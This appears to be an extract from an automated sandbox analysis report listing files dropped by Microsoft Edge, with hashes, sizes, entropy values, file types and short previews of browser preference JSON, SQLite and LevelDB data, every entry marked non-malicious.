                                                                                                                                                                                                                                                                                      SHA-512:F562E21F509BD229F668AA3D0A65CD71791558AF1D073AF3DFE43D757ADC781E231B1B76CF53B7E905B287897A0A0F2032557FFDB6FB188BB1CBFEAF1AE1A5C6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):36864
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.3760843474831321
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSlAW4:uIEumQv8m1ccnvS11DJlGFh5pWoyBw1a
                                                                                                                                                                                                                                                                                      MD5:DEFD93FCEA39542993894D7FA8659B3A
                                                                                                                                                                                                                                                                                      SHA1:4DFDFF7A2E15CE84569759BE04B8DA2F4A5FFF00
                                                                                                                                                                                                                                                                                      SHA-256:0E5EE87104C7EE7D622C04CB3BD0B746756445D927A5E65061BBE5870553A83A
                                                                                                                                                                                                                                                                                      SHA-512:C3B2D73B218E7847A4B2C6A9FE26C3D38539C5F3C8865E2470A6520F8AD0755D1313D1A8104BC261904291E06FE63E4D2AF0A4202D9AB37CDAF391F6B243DBF7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                      MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                      SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                      SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                      SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):9680
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.112583781537505
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stnkdp8BsIYyaNP9kXOIo8VmbV+Fp4QAXCPSYJ:stnQ8BsIYtJdbG6Q/
                                                                                                                                                                                                                                                                                      MD5:AF13559DB3792877F272DFB0170D6985
                                                                                                                                                                                                                                                                                      SHA1:19AF7DE8B4B0AE12C9951B7DB5E767C4F0664EE6
                                                                                                                                                                                                                                                                                      SHA-256:5B9CE1293A69C58C6F0555E4339916B37E3934AB3C38ED4B112F7303121F24ED
                                                                                                                                                                                                                                                                                      SHA-512:F690D82A8A326D0E2398679AFEEBDD9BA6E9B55A1A4E2D770015B9B417CE4D76E92D064A6DA0B31ED9C042C5911F07D3E304605FAE3AD19144B6A98A87AD7748
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379760322732592","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):25012
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.566941256586088
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:XQRbVbWP4afHe8F1+UoAYDCx9Tuqh0VfUC9xbog/OVyvhkSrwHpKtuCX:XQRbVbWP4afHeu1jafJkX8td
                                                                                                                                                                                                                                                                                      MD5:946A5A87E6740BEE007FD0C171107444
                                                                                                                                                                                                                                                                                      SHA1:66765AD1C24D8A94C3A8E5E60AEBF8134B387370
                                                                                                                                                                                                                                                                                      SHA-256:22380EF05AA67C241F3770C2A5B322AFD4CFCBF467E690FA7F660F57BC63FC20
                                                                                                                                                                                                                                                                                      SHA-512:F50D7474842F500ED4135B8A0B433A30AE05D7E4D8AED19ADCB4F16088E76428DD8E81B77AA865E393386C21E3902B73B4DCCDBE8A509C4C8ED79838BC0058F4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379760322200595","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379760322200595","location":5,"ma
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.323098996850684
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
                                                                                                                                                                                                                                                                                      MD5:8DA62954B0B14642CF287A260418E39B
                                                                                                                                                                                                                                                                                      SHA1:E82BF98669AE1D73BBD9294D9F454044D5C2622E
                                                                                                                                                                                                                                                                                      SHA-256:B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
                                                                                                                                                                                                                                                                                      SHA-512:E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):305
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.153237425820858
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyLDRFm3M1cNwi23oH+TcwtE/a252KLl1yLBlyq2PcNwi23oH+TcwtE/a2ZIFUv:IRFu2ZYeb8xL+yvLZYeb8J2FUv
                                                                                                                                                                                                                                                                                      MD5:9D32B5DB5DACC1FE9AD35A8485CE0C91
                                                                                                                                                                                                                                                                                      SHA1:FC754CCE030C5D978E44661651CF7A2659A5C621
                                                                                                                                                                                                                                                                                      SHA-256:7FA51E8987CCBFE46908176E00B601522118D2DC20CDADF2E3CB290C296E6B38
                                                                                                                                                                                                                                                                                      SHA-512:670509FE3F96EBBA2D86D8955A73A955BD841C44CC82EE6D715F17640CC91532770499A7FA04D5468B13003B00C7B35E3ACA8A812E4E75950C0B210A8CA0CE05
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:40.517 13c4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/27-03:05:40.542 13c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):114579
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.578784698937177
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ekkvvV:J9LyxPXfOxr1lMe1nL/5L/TXE6n7d2
                                                                                                                                                                                                                                                                                      MD5:509C2B48C2A1AFBEE9EDFBB99A6BC479
                                                                                                                                                                                                                                                                                      SHA1:C3AA06CF89C760208A0CD3E836A07767E49BBDA3
                                                                                                                                                                                                                                                                                      SHA-256:53C63177B85F6AAC60FC19A4FC528B4493D445456382560F456C77B5A363E4B1
                                                                                                                                                                                                                                                                                      SHA-512:7A5813DEE7C1A782000B5D7830533865BCC4E1F15BB8D791E446829E5E78D5D352378A555B9DA4F7458D7472B1200B2EE24666346B62BEE6D7C64E291ABD524D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):189113
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.388647853663027
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:RkljvDBmSs4wwqrff043L/EOTYuQ9vmd65yk1JfDvyURCLk:G24wwcfzL/zcu9dn1Nk
                                                                                                                                                                                                                                                                                      MD5:42B758BA16733BD0973C48141CBF733B
                                                                                                                                                                                                                                                                                      SHA1:692107FF0E735C9AF286FFAF54BACC2361277ADC
                                                                                                                                                                                                                                                                                      SHA-256:A81ED8D6898D56355360F1D7A60D0CD84571A064C59A2001BB14803864E127AE
                                                                                                                                                                                                                                                                                      SHA-512:021666146C7717976D0C16B00E044FA1A2BF70BDBCA438BF2B1C0898FDBFBD026C4A4F46DCA720514EC823A1F88BC4358D03C7D9F4F9AB7C2F80C5CA29C3DFF1
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):24
                                                                                                                                                                                                                                                                                      Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                      MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                      SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                      SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                      SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:0\r..m..................
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:KYAyXl/lYV/lxEstllQgrw7tKln:KtKYWs+grwkl
                                                                                                                                                                                                                                                                                      MD5:12543714E2D286B589230D797A4A84FE
                                                                                                                                                                                                                                                                                      SHA1:61425FCE9FB9E1C79677DD6DF384E96F22550629
                                                                                                                                                                                                                                                                                      SHA-256:440EB4E3173EA708F377B28EE1409BE7AAF06576280C2F37713C267D174688AE
                                                                                                                                                                                                                                                                                      SHA-512:D8CBFEC9A5FA6F71C28FBCCB79B400227719BEC7E23685ABE3198E9EA4709E9680C65E5E31CD2CF029455C7BFCC82D6A38F84FC7CFB04D9009E8CC950119819D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:@...?.W.oy retne.........................X....,..................U6./.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):5915
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.4009791913231564
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:c79MjuuyG9Xp+LL+ViE96Ll9iSrK1VhZvxVsfC3F7Y:c+j79Xp+HKiJLl9iSrKXhZ5V517
                                                                                                                                                                                                                                                                                      MD5:B0C9469A8D9E7DE28BDC19E333FD0857
                                                                                                                                                                                                                                                                                      SHA1:0A4398BAE10582357ED50B0D9E3962E128CF56A3
                                                                                                                                                                                                                                                                                      SHA-256:94AE545735B9AD35E679AF317E730D7A65B1A53664C5C41057A6474FF7805A73
                                                                                                                                                                                                                                                                                      SHA-512:786BE01FD64CBE9E581CB1A0BA4A21B8285B42F595C618F61E1A49E2B9CFAD3E273CD1C28E723C6736F98117A6127F7A2DE497BE6CEF518E73807E14A0F951AB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.168585507900992
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyfKUSS9+q2PcNwi23oH+TcwtrQMxIFUt8WyfKWlNJZmw+WyfK39VkwOcNwi23oM:fHS9+vLZYebCFUt8EWfJ/+Q39V54ZYeL
                                                                                                                                                                                                                                                                                      MD5:D95F6D13916965F1BC708C31FE4EEB66
                                                                                                                                                                                                                                                                                      SHA1:9D2E298308F6095C8417D0BF3EAB5F4F13B74C92
                                                                                                                                                                                                                                                                                      SHA-256:B9AD21CF663C8B624F9AEC1EB9C48E9468833CEB91A371367C174A0684DA5F76
                                                                                                                                                                                                                                                                                      SHA-512:17E5A42C354BB51DB58B935080BA13E8270647669E48B4216451046558222157AA0FD7C03BFE6C118CEA750DEF62F4F788F1D582AC523FDC454A41E38771CED8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.921 184c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/27-03:05:22.923 184c Recovering log #3.2024/12/27-03:05:22.999 184c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1443
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.842151352703171
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:3rainsl9MWwdpsAF4unxWBtLp3X2amEtG1ChqfJFUsJOQKkOAM4Z:3rai29MNzFGrLp2FEkChCFdJvHOpY
                                                                                                                                                                                                                                                                                      MD5:BADF6BB9376C10CE39C84F03AF14A7B4
                                                                                                                                                                                                                                                                                      SHA1:0AFFCC47E3CAE5FD7912AB819BBFCC6CA6B77443
                                                                                                                                                                                                                                                                                      SHA-256:768E10B19CDAA7B95FD07B476EC7C1CA97ABF726916D4B440F5DF613F4466F45
                                                                                                                                                                                                                                                                                      SHA-512:DA34901863BCE21BFA8D5FBF23BF5E290264C26BB3193D9E9F0364B4B24936F1A37A607DF2F5A017F7E9E2AB1D242AB0F9E9DC840054FC7DCC56A1566561C2AE
                                                                                                                                                                                                                                                                                      Malicious:false
